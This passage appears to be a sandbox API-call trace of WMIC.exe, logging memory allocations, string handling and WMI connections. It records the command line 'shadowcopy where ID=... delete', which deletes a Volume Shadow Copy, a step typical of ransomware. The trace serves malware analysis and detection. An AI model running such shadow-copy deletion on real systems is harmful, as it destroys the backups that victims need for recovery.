[7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff7c73f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x18faf8 | out: ppv=0x18faf8*=0x21e71d0) returned 0x0 [0101.826] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x21e71d0, xmlSource=0x18fc40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x496e50), isSuccessful=0x18fcb0 | out: isSuccessful=0x18fcb0*=0xffff) returned 0x0 [0101.948] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x21e71d0, DOMElement=0x18faf0 | out: DOMElement=0x18faf0) returned 0x0 [0101.948] malloc (_Size=0x18) returned 0x496e50 [0101.949] free (_Block=0x496e50) [0101.949] malloc (_Size=0x18) returned 0x496e50 [0101.949] free (_Block=0x496e50) [0101.949] malloc (_Size=0x18) returned 0x496e50 [0101.949] malloc (_Size=0x18) returned 0x496e70 [0101.950] malloc (_Size=0x30) returned 0x498080 [0101.950] malloc (_Size=0x18) returned 0x496eb0 [0101.950] free (_Block=0x496eb0) [0101.950] malloc (_Size=0x18) returned 0x49c560 [0101.950] malloc (_Size=0x18) returned 0x49c580 [0101.950] SysStringLen (param_1="VALUE") returned 0x5 [0101.950] SysStringLen (param_1="TABLE") returned 0x5 [0101.951] SysStringLen (param_1="TABLE") returned 0x5 [0101.951] SysStringLen (param_1="VALUE") returned 0x5 [0101.951] malloc (_Size=0x30) returned 0x4980c0 [0101.951] malloc (_Size=0x18) returned 0x49c5a0 [0101.951] free (_Block=0x49c5a0) [0101.951] malloc (_Size=0x18) returned 0x49c5a0 [0101.951] malloc (_Size=0x18) returned 0x49c5c0 [0101.951] SysStringLen (param_1="LIST") returned 0x4 [0101.951] SysStringLen (param_1="TABLE") returned 0x5 [0101.952] malloc (_Size=0x30) returned 0x498100 [0101.952] malloc (_Size=0x18) returned 0x49c5e0 [0101.952] free (_Block=0x49c5e0) [0101.952] malloc (_Size=0x18) returned 0x49c5e0 [0101.952] malloc (_Size=0x18) returned 0x49c600 [0101.952] SysStringLen (param_1="RAWXML") returned 0x6 [0101.952] SysStringLen (param_1="TABLE") returned 0x5 [0101.952] SysStringLen (param_1="RAWXML") returned 0x6 [0101.952] SysStringLen (param_1="LIST") returned 0x4 [0101.952] SysStringLen (param_1="LIST") returned 0x4 [0101.953] SysStringLen (param_1="RAWXML") returned 0x6 [0101.953] malloc (_Size=0x30) returned 0x498140 [0101.953] malloc (_Size=0x18) returned 0x49c620 [0101.953] free (_Block=0x49c620) [0101.953] malloc (_Size=0x18) returned 0x49c620 [0101.953] malloc (_Size=0x18) returned 0x49c640 [0101.953] SysStringLen (param_1="HTABLE") returned 0x6 [0101.953] SysStringLen (param_1="TABLE") returned 0x5 [0101.953] SysStringLen (param_1="HTABLE") returned 0x6 [0101.953] SysStringLen (param_1="LIST") returned 0x4 [0101.953] malloc (_Size=0x30) returned 0x498180 [0101.954] malloc (_Size=0x18) returned 0x49c660 [0101.954] free (_Block=0x49c660) [0101.954] malloc (_Size=0x18) returned 0x49c660 [0101.954] malloc (_Size=0x18) returned 0x49c680 [0101.954] SysStringLen (param_1="HFORM") returned 0x5 [0101.954] SysStringLen (param_1="TABLE") returned 0x5 [0101.954] SysStringLen (param_1="HFORM") returned 0x5 [0101.955] SysStringLen (param_1="LIST") returned 0x4 [0101.955] SysStringLen (param_1="HFORM") returned 0x5 [0101.955] SysStringLen (param_1="HTABLE") returned 0x6 [0101.955] malloc (_Size=0x30) returned 0x4981c0 [0101.955] malloc (_Size=0x18) returned 0x49c6a0 [0101.955] free (_Block=0x49c6a0) [0101.955] malloc (_Size=0x18) returned 0x49c6a0 [0101.955] malloc (_Size=0x18) returned 0x49c6c0 [0101.956] SysStringLen (param_1="XML") returned 0x3 [0101.956] SysStringLen (param_1="TABLE") returned 0x5 [0101.956] SysStringLen (param_1="XML") returned 0x3 [0101.956] SysStringLen (param_1="VALUE") returned 0x5 [0101.956] SysStringLen (param_1="VALUE") returned 0x5 [0101.956] SysStringLen (param_1="XML") returned 0x3 [0101.956] malloc (_Size=0x30) returned 0x498200 [0101.956] malloc (_Size=0x18) returned 0x49c6e0 [0101.956] free (_Block=0x49c6e0) [0101.956] malloc (_Size=0x18) returned 0x49c6e0 [0101.956] malloc (_Size=0x18) returned 0x49c700 [0101.956] SysStringLen (param_1="MOF") returned 0x3 [0101.956] SysStringLen (param_1="TABLE") returned 0x5 [0101.956] SysStringLen (param_1="MOF") returned 0x3 [0101.956] SysStringLen (param_1="LIST") returned 0x4 [0101.957] SysStringLen (param_1="MOF") returned 0x3 [0101.957] SysStringLen (param_1="RAWXML") returned 0x6 [0101.957] SysStringLen (param_1="LIST") returned 0x4 [0101.957] SysStringLen (param_1="MOF") returned 0x3 [0101.957] malloc (_Size=0x30) returned 0x498240 [0101.957] malloc (_Size=0x18) returned 0x49c720 [0101.957] free (_Block=0x49c720) [0101.957] malloc (_Size=0x18) returned 0x49c720 [0101.957] malloc (_Size=0x18) returned 0x49c740 [0101.957] SysStringLen (param_1="CSV") returned 0x3 [0101.957] SysStringLen (param_1="TABLE") returned 0x5 [0101.957] SysStringLen (param_1="CSV") returned 0x3 [0101.957] SysStringLen (param_1="LIST") returned 0x4 [0101.957] SysStringLen (param_1="CSV") returned 0x3 [0101.957] SysStringLen (param_1="HTABLE") returned 0x6 [0101.957] SysStringLen (param_1="CSV") returned 0x3 [0101.957] SysStringLen (param_1="HFORM") returned 0x5 [0101.957] malloc (_Size=0x30) returned 0x498280 [0101.958] malloc (_Size=0x18) returned 0x49c760 [0101.958] free (_Block=0x49c760) [0101.958] malloc (_Size=0x18) returned 0x49c760 [0101.958] malloc (_Size=0x18) returned 0x49c780 [0101.958] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.958] SysStringLen (param_1="TABLE") returned 0x5 [0101.958] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.958] SysStringLen (param_1="VALUE") returned 0x5 [0101.958] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.958] SysStringLen (param_1="XML") returned 0x3 [0101.958] SysStringLen (param_1="XML") returned 0x3 [0101.958] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.958] malloc (_Size=0x30) returned 0x4982c0 [0101.958] malloc (_Size=0x18) returned 0x49c7a0 [0101.959] free (_Block=0x49c7a0) [0101.959] malloc (_Size=0x18) returned 0x49c7a0 [0101.959] malloc (_Size=0x18) returned 0x49c7c0 [0101.959] SysStringLen (param_1="texttablewsys") returned 0xd [0101.959] SysStringLen (param_1="TABLE") returned 0x5 [0101.959] SysStringLen (param_1="texttablewsys") returned 0xd [0101.959] SysStringLen (param_1="XML") returned 0x3 [0101.959] SysStringLen (param_1="texttablewsys") returned 0xd [0101.959] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.959] SysStringLen (param_1="XML") returned 0x3 [0101.959] SysStringLen (param_1="texttablewsys") returned 0xd [0101.959] malloc (_Size=0x30) returned 0x498300 [0101.959] malloc (_Size=0x18) returned 0x49c7e0 [0101.959] free (_Block=0x49c7e0) [0101.959] malloc (_Size=0x18) returned 0x49c7e0 [0101.960] malloc (_Size=0x18) returned 0x49c800 [0101.960] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0101.960] SysStringLen (param_1="TABLE") returned 0x5 [0101.960] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0101.960] SysStringLen (param_1="XML") returned 0x3 [0101.960] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0101.960] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.960] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.960] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0101.960] malloc (_Size=0x30) returned 0x498340 [0101.960] malloc (_Size=0x18) returned 0x49c820 [0101.960] free (_Block=0x49c820) [0101.960] malloc (_Size=0x18) returned 0x49c820 [0101.960] malloc (_Size=0x18) returned 0x49c840 [0101.960] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0101.961] SysStringLen (param_1="TABLE") returned 0x5 [0101.961] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0101.961] SysStringLen (param_1="XML") returned 0x3 [0101.961] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0101.961] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.961] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0101.961] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0101.961] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.961] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0101.961] malloc (_Size=0x30) returned 0x498380 [0101.961] malloc (_Size=0x18) returned 0x49c860 [0101.961] free (_Block=0x49c860) [0101.961] malloc (_Size=0x18) returned 0x49c860 [0101.961] malloc (_Size=0x18) returned 0x49c880 [0101.961] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0101.961] SysStringLen (param_1="TABLE") returned 0x5 [0101.961] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0101.962] SysStringLen (param_1="XML") returned 0x3 [0101.962] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0101.962] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.962] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0101.962] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0101.962] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0101.962] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0101.962] malloc (_Size=0x30) returned 0x4983c0 [0101.962] malloc (_Size=0x18) returned 0x49c8a0 [0101.962] free (_Block=0x49c8a0) [0101.962] malloc (_Size=0x18) returned 0x49c8a0 [0101.962] malloc (_Size=0x18) returned 0x49c8c0 [0101.962] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0101.962] SysStringLen (param_1="TABLE") returned 0x5 [0101.962] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0101.962] SysStringLen (param_1="XML") returned 0x3 [0101.962] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0101.962] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.962] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0101.962] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0101.962] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0101.963] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0101.963] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0101.963] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0101.963] malloc (_Size=0x30) returned 0x498400 [0101.963] malloc (_Size=0x18) returned 0x49c8e0 [0101.963] free (_Block=0x49c8e0) [0101.963] malloc (_Size=0x18) returned 0x49c8e0 [0101.963] malloc (_Size=0x18) returned 0x49c900 [0101.963] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0101.963] SysStringLen (param_1="TABLE") returned 0x5 [0101.963] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0101.963] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.963] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0101.963] SysStringLen (param_1="XML") returned 0x3 [0101.963] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0101.963] SysStringLen (param_1="texttablewsys") returned 0xd [0101.963] SysStringLen (param_1="XML") returned 0x3 [0101.963] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0101.964] malloc (_Size=0x30) returned 0x498440 [0101.964] malloc (_Size=0x18) returned 0x49c920 [0101.964] free (_Block=0x49c920) [0101.964] malloc (_Size=0x18) returned 0x49c920 [0101.964] malloc (_Size=0x18) returned 0x49c940 [0101.964] SysStringLen (param_1="htable-sortby") returned 0xd [0101.964] SysStringLen (param_1="TABLE") returned 0x5 [0101.964] SysStringLen (param_1="htable-sortby") returned 0xd [0101.964] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.964] SysStringLen (param_1="htable-sortby") returned 0xd [0101.964] SysStringLen (param_1="XML") returned 0x3 [0101.964] SysStringLen (param_1="htable-sortby") returned 0xd [0101.964] SysStringLen (param_1="texttablewsys") returned 0xd [0101.964] SysStringLen (param_1="htable-sortby") returned 0xd [0101.964] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0101.964] SysStringLen (param_1="XML") returned 0x3 [0101.964] SysStringLen (param_1="htable-sortby") returned 0xd [0101.965] malloc (_Size=0x30) returned 0x498480 [0101.965] malloc (_Size=0x18) returned 0x49c960 [0101.965] free (_Block=0x49c960) [0101.965] malloc (_Size=0x18) returned 0x49c960 [0101.965] malloc (_Size=0x18) returned 0x49c980 [0101.965] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0101.965] SysStringLen (param_1="TABLE") returned 0x5 [0101.965] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0101.965] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.965] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0101.965] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0101.965] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0101.965] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0101.965] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.965] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0101.965] malloc (_Size=0x30) returned 0x4984c0 [0101.966] malloc (_Size=0x18) returned 0x49c9a0 [0101.966] free (_Block=0x49c9a0) [0101.966] malloc (_Size=0x18) returned 0x49c9a0 [0101.966] malloc (_Size=0x18) returned 0x49c9c0 [0101.966] SysStringLen (param_1="wmiclimofformat") returned 0xf [0101.966] SysStringLen (param_1="TABLE") returned 0x5 [0101.966] SysStringLen (param_1="wmiclimofformat") returned 0xf [0101.966] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.966] SysStringLen (param_1="wmiclimofformat") returned 0xf [0101.966] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0101.966] SysStringLen (param_1="wmiclimofformat") returned 0xf [0101.966] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0101.966] SysStringLen (param_1="wmiclimofformat") returned 0xf [0101.966] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0101.966] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.966] SysStringLen (param_1="wmiclimofformat") returned 0xf [0101.966] malloc (_Size=0x30) returned 0x498500 [0101.967] malloc (_Size=0x18) returned 0x49c9e0 [0101.967] free (_Block=0x49c9e0) [0101.967] malloc (_Size=0x18) returned 0x49c9e0 [0101.967] malloc (_Size=0x18) returned 0x49ca00 [0101.967] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0101.967] SysStringLen (param_1="TABLE") returned 0x5 [0101.967] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0101.967] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.967] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0101.967] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0101.967] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0101.967] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0101.967] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0101.967] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0101.967] malloc (_Size=0x30) returned 0x498540 [0101.968] malloc (_Size=0x18) returned 0x49ca20 [0101.968] free (_Block=0x49ca20) [0101.968] malloc (_Size=0x18) returned 0x49ca20 [0101.968] malloc (_Size=0x18) returned 0x49ca40 [0101.968] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0101.968] SysStringLen (param_1="TABLE") returned 0x5 [0101.968] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0101.968] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0101.968] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0101.968] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0101.968] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0101.968] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0101.968] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0101.968] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0101.968] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0101.968] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0101.968] malloc (_Size=0x30) returned 0x498580 [0101.969] FreeThreadedDOMDocument:IUnknown:Release (This=0x21e71d0) returned 0x0 [0101.969] free (_Block=0x496e90) [0101.969] GetCommandLineW () returned="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete" [0101.969] malloc (_Size=0xe0) returned 0x49cd30 [0101.969] memcpy_s (in: _Destination=0x49cd30, _DestinationSize=0xde, _Source=0x1b25be, _SourceSize=0xd0 | out: _Destination=0x49cd30) returned 0x0 [0101.969] malloc (_Size=0x18) returned 0x49ca60 [0101.969] malloc (_Size=0x18) returned 0x49ca80 [0101.969] malloc (_Size=0x18) returned 0x49caa0 [0101.969] malloc (_Size=0x18) returned 0x49cac0 [0101.969] malloc (_Size=0x80) returned 0x496e90 [0101.969] GetLocalTime (in: lpSystemTime=0x18fc90 | out: lpSystemTime=0x18fc90*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x5, wDay=0x4, wHour=0x8, wMinute=0x37, wSecond=0x6, wMilliseconds=0x20a)) [0101.969] _vsnwprintf (in: _Buffer=0x496e90, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x18fbe8 | out: _Buffer="09-04-2020T08:55:06") returned 19 [0101.969] lstrlenW (lpString=" shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete") returned 71 [0101.969] malloc (_Size=0x90) returned 0x4970a0 [0101.969] lstrlenW (lpString=" shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete") returned 71 [0101.969] lstrlenW (lpString=" shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete") returned 71 [0101.969] malloc (_Size=0x90) returned 0x49ce20 [0101.969] lstrlenW (lpString=" shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete") returned 71 [0101.970] lstrlenW (lpString=" shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete") returned 71 [0101.970] lstrlenW (lpString=" shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete") returned 71 [0101.970] malloc (_Size=0x16) returned 0x49cae0 [0101.970] lstrlenW (lpString="shadowcopy") returned 10 [0101.970] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0101.970] malloc (_Size=0x16) returned 0x49cb00 [0101.970] malloc (_Size=0x8) returned 0x497140 [0101.970] free (_Block=0x0) [0101.970] free (_Block=0x49cae0) [0101.970] lstrlenW (lpString=" shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete") returned 71 [0101.970] malloc (_Size=0xc) returned 0x49cae0 [0101.970] lstrlenW (lpString="where") returned 5 [0101.970] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0101.970] malloc (_Size=0xc) returned 0x49cb20 [0101.970] malloc (_Size=0x10) returned 0x49cb40 [0101.970] memmove_s (in: _Destination=0x49cb40, _DestinationSize=0x8, _Source=0x497140, _SourceSize=0x8 | out: _Destination=0x49cb40) returned 0x0 [0101.970] free (_Block=0x497140) [0101.970] free (_Block=0x0) [0101.970] free (_Block=0x49cae0) [0101.970] lstrlenW (lpString=" shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete") returned 71 [0101.970] malloc (_Size=0x5c) returned 0x49cec0 [0101.970] lstrlenW (lpString="\"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\"") returned 45 [0101.970] _wcsicmp (_String1="\"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\"", _String2="\"NULL\"") returned -5 [0101.970] lstrlenW (lpString="\"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\"") returned 45 [0101.970] lstrlenW (lpString="\"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\"") returned 45 [0101.970] malloc (_Size=0x5c) returned 0x49cf30 [0101.970] malloc (_Size=0x18) returned 0x49cae0 [0101.970] memmove_s (in: _Destination=0x49cae0, _DestinationSize=0x10, _Source=0x49cb40, _SourceSize=0x10 | out: _Destination=0x49cae0) returned 0x0 [0101.970] free (_Block=0x49cb40) [0101.970] free (_Block=0x0) [0101.970] free (_Block=0x49cec0) [0101.970] lstrlenW (lpString=" shadowcopy where \"ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'\" delete") returned 71 [0101.971] malloc (_Size=0xe) returned 0x49cb40 [0101.971] lstrlenW (lpString="delete") returned 6 [0101.971] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0101.971] malloc (_Size=0xe) returned 0x49cb60 [0101.971] malloc (_Size=0x20) returned 0x49cec0 [0101.971] memmove_s (in: _Destination=0x49cec0, _DestinationSize=0x18, _Source=0x49cae0, _SourceSize=0x18 | out: _Destination=0x49cec0) returned 0x0 [0101.971] free (_Block=0x49cae0) [0101.971] free (_Block=0x0) [0101.971] free (_Block=0x49cb40) [0101.971] malloc (_Size=0x20) returned 0x49cef0 [0101.971] lstrlenW (lpString="QUIT") returned 4 [0101.971] lstrlenW (lpString="shadowcopy") returned 10 [0101.971] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0101.971] lstrlenW (lpString="EXIT") returned 4 [0101.971] lstrlenW (lpString="shadowcopy") returned 10 [0101.971] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0101.971] free (_Block=0x49cef0) [0101.971] WbemLocator:IUnknown:AddRef (This=0x1d71390) returned 0x2 [0101.971] malloc (_Size=0x20) returned 0x49cef0 [0101.971] lstrlenW (lpString="/") returned 1 [0101.971] lstrlenW (lpString="shadowcopy") returned 10 [0101.971] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0101.971] lstrlenW (lpString="-") returned 1 [0101.971] lstrlenW (lpString="shadowcopy") returned 10 [0101.971] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0101.972] lstrlenW (lpString="CLASS") returned 5 [0101.972] lstrlenW (lpString="shadowcopy") returned 10 [0101.972] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0101.972] lstrlenW (lpString="PATH") returned 4 [0101.972] lstrlenW (lpString="shadowcopy") returned 10 [0101.972] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0101.972] lstrlenW (lpString="CONTEXT") returned 7 [0101.972] lstrlenW (lpString="shadowcopy") returned 10 [0101.972] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0101.972] lstrlenW (lpString="shadowcopy") returned 10 [0101.972] malloc (_Size=0x16) returned 0x49cb40 [0101.972] lstrlenW (lpString="shadowcopy") returned 10 [0101.972] GetCurrentThreadId () returned 0x9c8 [0101.972] ??0CHString@@QEAA@XZ () returned 0x18faa0 [0101.972] malloc (_Size=0x18) returned 0x49cae0 [0101.972] malloc (_Size=0x18) returned 0x49cb80 [0101.972] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d71390, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff832998 | out: ppNamespace=0xff832998*=0x1d83a98) returned 0x0 [0101.992] free (_Block=0x49cb80) [0101.992] free (_Block=0x49cae0) [0101.992] CoSetProxyBlanket (pProxy=0x1d83a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0101.993] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0101.993] GetCurrentThreadId () returned 0x9c8 [0101.993] ??0CHString@@QEAA@XZ () returned 0x18f938 [0101.993] malloc (_Size=0x18) returned 0x49cae0 [0101.993] malloc (_Size=0x18) returned 0x49cb80 [0101.993] malloc (_Size=0x18) returned 0x49cba0 [0101.993] malloc (_Size=0x18) returned 0x49cbc0 [0101.993] SysStringLen (param_1="root\\cli") returned 0x8 [0101.993] SysStringLen (param_1="\\") returned 0x1 [0101.993] malloc (_Size=0x18) returned 0x49cbe0 [0101.993] SysStringLen (param_1="root\\cli\\") returned 0x9 [0101.993] SysStringLen (param_1="ms_409") returned 0x6 [0101.993] free (_Block=0x49cbc0) [0101.994] free (_Block=0x49cba0) [0101.994] free (_Block=0x49cb80) [0101.994] free (_Block=0x49cae0) [0101.994] malloc (_Size=0x18) returned 0x49cae0 [0101.994] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d71390, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff8329a0 | out: ppNamespace=0xff8329a0*=0x1d83b28) returned 0x0 [0101.999] free (_Block=0x49cae0) [0101.999] free (_Block=0x49cbe0) [0101.999] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0101.999] GetCurrentThreadId () returned 0x9c8 [0102.000] ??0CHString@@QEAA@XZ () returned 0x18fab0 [0102.000] malloc (_Size=0x18) returned 0x49cbe0 [0102.000] malloc (_Size=0x18) returned 0x49cae0 [0102.000] malloc (_Size=0x18) returned 0x49cb80 [0102.000] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0102.000] malloc (_Size=0x3a) returned 0x49cfa0 [0102.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff7c1980, cbMultiByte=-1, lpWideCharStr=0x49cfa0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0102.000] free (_Block=0x49cfa0) [0102.000] malloc (_Size=0x18) returned 0x49cba0 [0102.000] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0102.000] SysStringLen (param_1="shadowcopy") returned 0xa [0102.000] malloc (_Size=0x18) returned 0x49cbc0 [0102.000] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0102.000] SysStringLen (param_1="'") returned 0x1 [0102.000] free (_Block=0x49cba0) [0102.000] free (_Block=0x49cb80) [0102.000] free (_Block=0x49cae0) [0102.000] free (_Block=0x49cbe0) [0102.001] IWbemServices:GetObject (in: This=0x1d83a98, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x18fab8*=0x0, ppCallResult=0x0 | out: ppObject=0x18fab8*=0x1d904e0, ppCallResult=0x0) returned 0x0 [0102.007] malloc (_Size=0x18) returned 0x49cbe0 [0102.007] IWbemClassObject:Get (in: This=0x1d904e0, wszName="Target", lFlags=0, pVal=0x18f9e0*(varType=0x0, wReserved1=0xff83, wReserved2=0x0, wReserved3=0x0, varVal1=0xff832998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f9e0*(varType=0x8, wReserved1=0xff83, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0102.007] free (_Block=0x49cbe0) [0102.007] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0102.007] malloc (_Size=0x3e) returned 0x49cfa0 [0102.007] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0102.008] malloc (_Size=0x18) returned 0x49cbe0 [0102.008] IWbemClassObject:Get (in: This=0x1d904e0, wszName="PWhere", lFlags=0, pVal=0x18f9e0*(varType=0x0, wReserved1=0xff83, wReserved2=0x0, wReserved3=0x0, varVal1=0x1de298, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x18f9e0*(varType=0x8, wReserved1=0xff83, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0102.008] free (_Block=0x49cbe0) [0102.008] lstrlenW (lpString=" Where ID = '#'") returned 15 [0102.008] malloc (_Size=0x20) returned 0x49cff0 [0102.008] lstrlenW (lpString=" Where ID = '#'") returned 15 [0102.008] malloc (_Size=0x18) returned 0x49cbe0 [0102.008] IWbemClassObject:Get (in: 